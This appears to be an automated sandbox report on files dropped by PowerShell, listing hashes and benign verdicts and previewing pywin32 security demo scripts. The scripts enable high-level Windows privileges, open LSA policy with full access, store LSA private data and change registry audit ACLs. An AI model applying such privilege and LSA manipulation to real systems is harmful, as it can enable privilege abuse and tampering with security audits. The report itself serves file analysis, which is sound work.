                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...e.....d...\.Z.Z.e.e.....e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.j.e.j.B.e.j.B.e.j.B.Z.e.....Z.e...e.e.j ..Z!e.."e!d.e.....e..#e!e.j$..d...Z%e..&d.d...d...Z'e..(e.e.j)e...Z*e*.+..Z,e,d.u.r.e..-..Z,e*....Z/e/d.u.r.e..-..Z/e,.0..Z1e/.0..Z2e,.3e,.4..e.j5e.j6B.e%....e/.7e/.4..e.j8e%d.d.....e..9e.e.j)e.e'e'e,e/....e..(e.e.j)e...Z:e:.+...0..e1d...k...r.e.d.....e:.....0..e2d...k...r.e.d.....e..;d.e:.<....d...d.k...r?e.d.....e..;d.e:.=....d...d.k...rPe.d.....e..9e.e.j)e.j.d.d.d.d.....e..(e.e.j)e.j...Z>e>....d.u...rse.d.....d.S.d.S.)......N..tmp..z.Power Users.....z'New dacl doesn't contain extra ace ????z'New Sacl doesn't contain extra ace ????z/Owner not successfully set to Power Users !!!!!z/Group not successfully set to Power Users
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2472
                                                                                                                                                                                                            Entropy (8bit):6.034682780607103
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CBR67l/RN1WP6BvPSsSXH7AO7BD1/cLSkqigH2Z6IM0pY110Nd5ZiD2w3333333y:Cr6hZN1WP8o7HBiWkqczm110NHg7333y
                                                                                                                                                                                                            MD5:ADC5A75D60B2A8DAB1B9F4D89C88CDD1
                                                                                                                                                                                                            SHA1:F39802272ED1A70A414622967FACED4919222E41
                                                                                                                                                                                                            SHA-256:FDC88852A3F613F50A85C6C5956A2BE9052EF3151DF84F2301687B86337288E3
                                                                                                                                                                                                            SHA-512:4646AA07F7D9ADD090FD4ADA884257583F4A38603E9D1B1AC7ED8F35B5998AAE3CBC4B01BAEDC095BF4F6F04238CF1A227BB94D99A9271B1323C49AF281D9A5B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g=........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.j.e.j.B.e.j.B.e.j.B.Z.e.....Z.e...e.j.d.e...Z.e...e.e.j...Z.e.. e.d.e...Z!e.."e.e.j#..d...Z$e..%d.d...d...Z&e...e.j.e.j'B.d.e...Z.e..(e.e.j)e...Z*e*.+..Z,e,d.u.r.e..-..Z,e*....Z/e/d.u.r.e..-..Z/e,.0..Z1e/.0..Z2e,.3e,.4..e.j'e.j5B.e$....e/.6e/.4..e.j7e$d.d.....e..8e.e.j)e.e&e&e,e/....e..(e.e.j)e...Z9e9.+...0..e1d...k...r$e:d.....e9.....0..e2d...k...r3e:d.....e..;d.e9.<....d...d.k...rDe:d.....e..;d.e9.=....d...d.k...rUe:d.....e..8e.e.j)e.j.d.d.d.d.....e..(e.e.j)e.j...Z>e>....d.u...rxe:d.....d.S.d.S.)......N..z.Power Users.....z'New dacl doesn't contain extra ace ????z'New Sacl doesn't contain extra ace ????z/Owner not successfully set to Power Users !!!!!z/Group not successfully set to Power U
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2154
                                                                                                                                                                                                            Entropy (8bit):5.993941647807102
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:C+R67lh6u5TzbhH7AO7BD1/cLSk7ogM9o3p21LN15Z02XR33333333byY:Ci6hZ5/h7HBiWknN301LN/dl33333333
                                                                                                                                                                                                            MD5:03242BA473737B1288F974690D6A9A1C
                                                                                                                                                                                                            SHA1:FE1F901A4D6A7C40BC6ECA38AA6F974728820B7D
                                                                                                                                                                                                            SHA-256:0D98017B7A9F971DD00B6F54532453A75E183BF0F888B5BF176F8E23A01F7EF3
                                                                                                                                                                                                            SHA-512:D1E83B9B7DE19A6DAA6F253775000A4DE1D27228D3125020ADBA378694639CE07FD8B181A785A4B57DC537F954F284E8BE5225E69E7EE84EE7EB1FBD6E7A0BFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sP...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.j.e.j.B.e.j.B.e.j.B.Z.e.j.e.j.B.e.j.B.Z.e.....Z.e...e.e.j...Z.e...e.d.e.....e...e.e.j ..d...Z!e.."d.d...d...Z#e..$..Z%e..&e%e...Z'e'.(..Z)e).*..Z+e).,e).-..e.j.e.j/B.e!....e'.0d.e)d.....e'.1e#d.....e'.2e#d.....e..3e%e.e'....e..&e%e...Z4e4.(...*..e+d...k...s.J.d.....e..5d.e4.6....d...d.k...s.J.d.....e..5d.e4.7....d...d.k...s&J.d.....d.S.)......N..z.Power Users.....z%Did not add an ace to the Dacl !!!!!!z/Owner not successfully set to Power Users !!!!!z/Group not successfully set to Power Users !!!!!)8Z.win32apiZ.win32conZ.win32processZ.win32securityZ.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_TCB_NAMEZ.SE_SHUTDOWN_NAMEZ.SE_RESTORE_NAMEZ.SE_TAKE_OWNERSHIP_NAMEZ.SE_CREATE_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1652
                                                                                                                                                                                                            Entropy (8bit):5.283416337617308
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1XhyqZfijVFYcFe0azGn0KcSRL7MMz7EkC67v9zELNmry7v9f0:1XhlxixFYcFe0aan0KcS5MMnlZzEL9Zs
                                                                                                                                                                                                            MD5:90C2519209E54F6E0713F85F74897107
                                                                                                                                                                                                            SHA1:7617CD9D2FAF75D24EED2CE0528EB94246E93B96
                                                                                                                                                                                                            SHA-256:9355E4B2A649CA1934DCDB52F946E8F621F37A26D0E3889E135DBC2CB4AB4784
                                                                                                                                                                                                            SHA-512:D831DAE67B6CDA39B7C4C358A00458DA5F6DE10993973F42E212A28758F8F8748E0AF77DC0AE7E4AB7D861553FE97A23DE631F59F9814747BDAF5F8535079365
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32api..import win32con..import win32file..import win32security..from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),.. win32con.SE_PRIVILEGE_ENABLED,.. ), ##doesn't seem to be in ntsecuritycon.py ?..)....ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32security.TOKEN_ALL_ACCESS..) ##win32con.TOKEN_ADJUST_PRIVILEGES)..win32security.AdjustTokenPrivileges(th, 0, new_privs)....policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)..tmp_sid = win32security.LookupAccountName("", "tmp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5153
                                                                                                                                                                                                            Entropy (8bit):5.281143996058845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:S0FgixFIFoFTFrFFaazxnaZwOxnGkD1GVNcmcLcDwcJcQWcEVcExcEOq:hqWh1faKxabnGkD1GVNcmcLcEcJcXc+L
                                                                                                                                                                                                            MD5:A86F111E7B5D76AADEA0C761AE2B3F2D
                                                                                                                                                                                                            SHA1:4A658E575F7888676B6589797EEF4B45CC277929
                                                                                                                                                                                                            SHA-256:1CA4B5D1743669D1E5410A5C519C87F0A926268763439A987461213CBD6023D7
                                                                                                                                                                                                            SHA-512:B7F2A5692571B9A4DB7188F886FD8A76525F9272636F111D5B46F62C23413F136FB9FCEF3BC36F656767B3133D8CFE49DB2ADA0FE389C506C93D52B83A4DA8AD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os....import ntsecuritycon..import win32api..import win32con..import win32file..import win32security..from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE....fname = os.path.join(win32api.GetTempPath(), "win32security_test.txt")..f = open(fname, "w")..f.write("Hello from Python\n")..f.close()..print("Testing on file", fname)....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CRE
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1284
                                                                                                                                                                                                            Entropy (8bit):4.873137226810655
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1Xj1WidVQMN0dtf4eYGjSnxC8rrkjc+IjThdUIjCdfpjrTF0:1XB8H4eMxC82SUHfBTW
                                                                                                                                                                                                            MD5:78029B93C0631F2036E42D153A5689E5
                                                                                                                                                                                                            SHA1:9F7F68BB3D613420E73230A0489E8FE8D69AF166
                                                                                                                                                                                                            SHA-256:FD2225B94CC62625C37BAE7ED9E13DB47C5B9B03EFF2A76A583B858D8CF1372F
                                                                                                                                                                                                            SHA-512:3DB08BB1E2CD98BF3CAD5B3B473E905CBFA6095C02800CC61AEF8DB11C94D6CF36DBD2FA14463E6733CCE6F9D1FE2E3782411656BBBBF6844FE02FE547CBF1D9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32api..import win32file..import win32security....policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)....# mod_nbr, mod_time = win32security.LsaQueryInformationPolicy(policy_handle,win32security.PolicyModificationInformation)..# print(mod_nbr, mod_time)....(.. domain_name,.. dns_domain_name,.. dns_forest_name,.. domain_guid,.. domain_sid,..) = win32security.LsaQueryInformationPolicy(.. policy_handle, win32security.PolicyDnsDomainInformation..)..print(domain_name, dns_domain_name, dns_forest_name, domain_guid, domain_sid)....event_audit_info = win32security.LsaQueryInformationPolicy(.. policy_handle, win32security.PolicyAuditEventsInformation..)..print(event_audit_info)....domain_name, sid = win32security.LsaQueryInformationPolicy(.. policy_handle, win32security.PolicyPrimaryDomainInformation..)..print(domain_name, sid)....domain_name, sid = win32security.LsaQueryInformationPolicy(.. policy_ha
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1179
                                                                                                                                                                                                            Entropy (8bit):5.260331493009126
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1XsLgzL5sLLQLZN5mk+OW6iGCffsYftsd0sYftiFv7YfDG+YzoKDO4eqLvKN6HSa:1XhyqZfijVFYcFe0azGn0KcSRL6stYI0
                                                                                                                                                                                                            MD5:6FB4C908FB52168923D666649F5CFB69
                                                                                                                                                                                                            SHA1:61235E3EBBD1068476CD9CF87472DC9843A289E3
                                                                                                                                                                                                            SHA-256:BC3B0B1552F69C0CC596EE3435FA6C70808879754E5538C0A4A7AEB000A1B0C8
                                                                                                                                                                                                            SHA-512:73A8B44EAF8E3E79969A1037586B123EEA57C48DD9186A41F6A10E16B33D0DE40394B23BB715536141C2D792FFFBAFF06BB551553C5530F7B4898B80B060F198
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32api..import win32con..import win32file..import win32security..from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),.. win32con.SE_PRIVILEGE_ENABLED,.. ), ##doesn't seem to be in ntsecuritycon.py ?..)....ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32security.TOKEN_ALL_ACCESS..) ##win32con.TOKEN_ADJUST_PRIVILEGES)..win32security.AdjustTokenPrivileges(th, 0, new_privs)....policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)....sidlist = win32security.LsaEnumerateAccountsWith
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2069
                                                                                                                                                                                                            Entropy (8bit):5.0129351877354775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:5mRAAiNkZVF/veDK18r4TJ1TqUjdP0WR2Y/doNazTqUjdmeNqEV44P1nVoy:5mmAiNkZV58O8reNpP0WR2xeNpmYqEV3
                                                                                                                                                                                                            MD5:D7CA55B4AFED63BC35836D07FAEBC379
                                                                                                                                                                                                            SHA1:F812877E992F96B5D2E1448C35145308F3330171
                                                                                                                                                                                                            SHA-256:ADDC28F0C631940BF2DC8E85CDF4DD44B334FEC0330EF92411A23B9A8E72808D
                                                                                                                                                                                                            SHA-512:18064C63A53CD28C3E47EF422D437F630DA4CEDEE1A590E2BFC561693649CA54F45D45C5441BD4C3FD93AA44EA21FDD366262671E2DC601BBFA4B8089BF30A35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A Python port of the MS knowledge base article Q157234..# "How to deal with localized and renamed user and group names"..# http://support.microsoft.com/default.aspx?kbid=157234....import sys....import pywintypes..from ntsecuritycon import *..from win32net import NetUserModalsGet..from win32security import LookupAccountSid......def LookupAliasFromRid(TargetComputer, Rid):.. # Sid is the same regardless of machine, since the well-known.. # BUILTIN domain is referenced... sid = pywintypes.SID().. sid.Initialize(SECURITY_NT_AUTHORITY, 2).... for i, r in enumerate((SECURITY_BUILTIN_DOMAIN_RID, Rid)):.. sid.SetSubAuthority(i, r).... name, domain, typ = LookupAccountSid(TargetComputer, sid).. return name......def LookupUserGroupFromRid(TargetComputer, Rid):.. # get the account domain Sid on the target machine.. # note: if you were looking up multiple sids based on the same.. # account domain, only need to call this once... umi2 = NetUserModalsGet(Targ
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):546
                                                                                                                                                                                                            Entropy (8bit):4.939393227263389
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:4LeL5LqeLUS4UHXA0rXcFSsygPNLAXKCJRulNSKQM3A0rXB:Z714UHXAEcFSmlUzSlNSKZAEB
                                                                                                                                                                                                            MD5:A80E749BE0D558C4C59E1D6AAE5EF293
                                                                                                                                                                                                            SHA1:43A39CF6121A16763939EA5CDADDB879D6135AB5
                                                                                                                                                                                                            SHA-256:A9B6978B82EE1374DF82185A039C0DC9C0FDF4F39FB432FB1E5FB57E8F88458C
                                                                                                                                                                                                            SHA-512:8DCF04B027F103451D2825B85A440B648450559D8401FC8B3777D8D13C6850140281A21510ADCCF9705474DA94FEC0D4F53245506C8742187CDFA552772E198F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32event..import win32security....evt = win32event.CreateEvent(None, 0, 0, None)..win32security.LsaRegisterPolicyChangeNotification(.. win32security.PolicyNotifyAuditEventsInformation, evt..)..print("Waiting for you change Audit policy in Management console ...")..ret_code = win32event.WaitForSingleObject(evt, 1000000000)..## should come back when you change Audit policy in Management console .....print(ret_code)..win32security.LsaUnregisterPolicyChangeNotification(.. win32security.PolicyNotifyAuditEventsInformation, evt..)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):484
                                                                                                                                                                                                            Entropy (8bit):4.911187846882958
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:4LyhwmBkwmAo9PooPWBMJvFlqoNh/vokBnn5StPook+wZ9y:NX8mo+2Jv7NZvxXokl0
                                                                                                                                                                                                            MD5:0D5F1447718CDC3EF361C3E99A3B1966
                                                                                                                                                                                                            SHA1:43B4C11E7DE79F3294EADA8897BC1D11FB3A44CA
                                                                                                                                                                                                            SHA-256:B01E5112DF7A7EE7D9E64ED27126A049AFE16BF9D76B5ECDEAE1A0F106231036
                                                                                                                                                                                                            SHA-512:66FF3D707A745E5EEC96949D98D85483F7F09CD10BA146A2F321A44289DC93B01E333F72486949240D547588094C952818F5A3FDF7EB3DF230CE5C76F79DC95E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32security....policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)..privatedata = "some sensitive data"..keyname = "tmp"..win32security.LsaStorePrivateData(policy_handle, keyname, privatedata)..retrieveddata = win32security.LsaRetrievePrivateData(policy_handle, keyname)..assert retrieveddata == privatedata....## passing None deletes key..win32security.LsaStorePrivateData(policy_handle, keyname, None)..win32security.LsaClose(policy_handle)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):816
                                                                                                                                                                                                            Entropy (8bit):4.871649739996659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:4LgzLVWLKFMapoSvgKWl4ryZpSYrGLPhNvNKGbGtXDlut4eWdEuONTJTeY2ptLv:/Rj4KWl4y6YeNUKSlutnpNTJelp1v
                                                                                                                                                                                                            MD5:C8BB0C6BBD52AF8462CC17BA8AD00F4B
                                                                                                                                                                                                            SHA1:E1F17DEF290889AC2BEADA037739ECCE9E3E5F02
                                                                                                                                                                                                            SHA-256:961A736E07766691A6EB0D475B300F02DB0A7F344554378F49D5A2F170F25E5F
                                                                                                                                                                                                            SHA-512:B52BE6F251310CB194BAE124A77FCECA066B3A7441495B9D7BFE9F3E693DF8F07D406954D5E0F67FA2B1564BB4E452D727624F7D0F5833418DB96F2EF21710DE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32security..import winerror..from ntsecuritycon import *......# This is a Python implementation of win32api.GetDomainName()..def GetDomainName():.. try:.. tok = win32security.OpenThreadToken(win32api.GetCurrentThread(), TOKEN_QUERY, 1).. except win32api.error as details:.. if details[0] != winerror.ERROR_NO_TOKEN:.. raise.. # attempt to open the process token, since no thread token.. # exists.. tok = win32security.OpenProcessToken(win32api.GetCurrentProcess(), TOKEN_QUERY).. sid, attr = win32security.GetTokenInformation(tok, TokenUser).. win32api.CloseHandle(tok).... name, dom, typ = win32security.LookupAccountSid(None, sid).. return dom......if __name__ == "__main__":.. print("Domain name is", GetDomainName())..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1751
                                                                                                                                                                                                            Entropy (8bit):5.353613593714105
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lXjaixFHFFOFoF/n0KkScZ5tBAlgyndMiQFj9qK+:kixFHFcFoF/zpCdJfPVx+
                                                                                                                                                                                                            MD5:46E7A1278AE4D508A8CDE452039A5AED
                                                                                                                                                                                                            SHA1:39B15CDAD7E44DA92B87CCEE84C8E3C1A5543700
                                                                                                                                                                                                            SHA-256:515F756FF4CBE6E7012E4F7C0B1AC59809B49064720B06C24AD1490470C95081
                                                                                                                                                                                                            SHA-512:C95990AF46188F1138D94C9EA073489B73749FEF02B50C466A7A5F398C37299AF99A7BB4BE496AAD0AE6340ECB885EC1B1C0284EA48CBA5CF829D978E8AB41E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:fname = "h:\\tmp.reg"....import os....import ntsecuritycon..import pywintypes..import win32api..import win32con..import win32security....## regsave will not overwrite a file..if os.path.isfile(fname):.. os.remove(fname)....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),..)..ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES..)..win32security.AdjustTokenPrivileges(th, 0, new_privs)..my_sid = win32
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1157
                                                                                                                                                                                                            Entropy (8bit):5.380238154993139
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1XhuijVFHF/n0KkSpp5tD3SZWwHVsgGJKTmMTZKRhcsIZGQRTy:1XhuixFHF/n0KkSpp5tWGgIXMTZUhcsh
                                                                                                                                                                                                            MD5:8CD1576FFC23F72AF83426CABCDDF890
                                                                                                                                                                                                            SHA1:D2B74D930C8B5CD4F3E6BB714A5396A271EC4288
                                                                                                                                                                                                            SHA-256:C288DFD44959E4AC7CC6D0BF3370D48BBCBBD3F78693B6F60356D7AE8B6FA723
                                                                                                                                                                                                            SHA-512:0C037F446A5595EB779E695C00BFFAAD174CD2CA5A59CE6AA33F1C01CF58857568ED4ABBBB744079456B4A6602B2F0982BDFB28B18FD8F92FCC2DF22C68DA514
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32api..import win32con..import win32security....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),..)..ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES..)....win32security.AdjustTokenPrivileges(th, 0, new_privs)..hkey = win32api.RegOpenKey(.. win32con.HKEY_LOCAL_MACHINE, None, 0, win32con.KEY_ALL_ACCESS..)..win32api.RegCreateKey(hkey, "SYSTEM\\NOTMP")..notmpkey = win32api.RegOpenKey(.. hkey, "SYSTEM\\notmp", 0, win32con.ACCESS_SYSTEM_SECURITY..)....tmp_sid = win32security.LookupAccountName("", "tmp")[0]..sacl = win32security.ACL()..sacl.AddAuditAccessAce(win32security.ACL_REVISION, win32con.GENERIC_ALL, tmp_sid, 1, 1)....sd =
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):289
                                                                                                                                                                                                            Entropy (8bit):5.162160385715765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:kLL/RXCjpEBpIdRRBxar+OVAV/2lzHg1g3/2lZRBLnAv:kLLRCygRMrDVAV+lzIgul5sv
                                                                                                                                                                                                            MD5:01D6EC7400575F48469F2C07C35495A3
                                                                                                                                                                                                            SHA1:E221C490D1AF0BAECFB7A049A8E830D464E74EC2
                                                                                                                                                                                                            SHA-256:C644FD1C5A8DBCBC1D0531CC98F744B638DFD7DB6CADF97C94EA89872B1CBE68
                                                                                                                                                                                                            SHA-512:086530618B7D1E3227620A1CFDCB2D75AA7237612FE203E4A1245A1082F9956ADD2FE63E72C2F9F69EA5EA13E4FE864E436C471375AA9A1AA07FE41247814F6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import pywintypes..import win32security....sa = pywintypes.SECURITY_ATTRIBUTES()..tmp_sid = win32security.LookupAccountName("", "tmp")[0]..sa.SetSecurityDescriptorOwner(tmp_sid, 0)..sid = sa.SECURITY_DESCRIPTOR.GetSecurityDescriptorOwner()..print(win32security.LookupAccountSid("", sid))..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9776
                                                                                                                                                                                                            Entropy (8bit):5.139583351813982
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pJeF1QEGEdXeROKgIeng9ogXQtOB+PzbbCn5ueWc5wbMeZfpE+whe+T:sc5wkN
                                                                                                                                                                                                            MD5:5C68973F104D8F4EEEF98B7627E32D61
                                                                                                                                                                                                            SHA1:EB3E3BB51BC5A2DEEC098B721C036B6B217ED225
                                                                                                                                                                                                            SHA-256:1DCF85687CAD60B3BE1E6524C396409129414A172FFC6528B03D305B22E5FE18
                                                                                                                                                                                                            SHA-512:DCE9E1DDE4D375ADC5FC79D2FB72BE6DBB5F28B5AEADBA691633CFA243361796F960DCA5C2155EBC3BE329AC9A31B1C480DC1AD8F31D5400090868E590E87C27
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
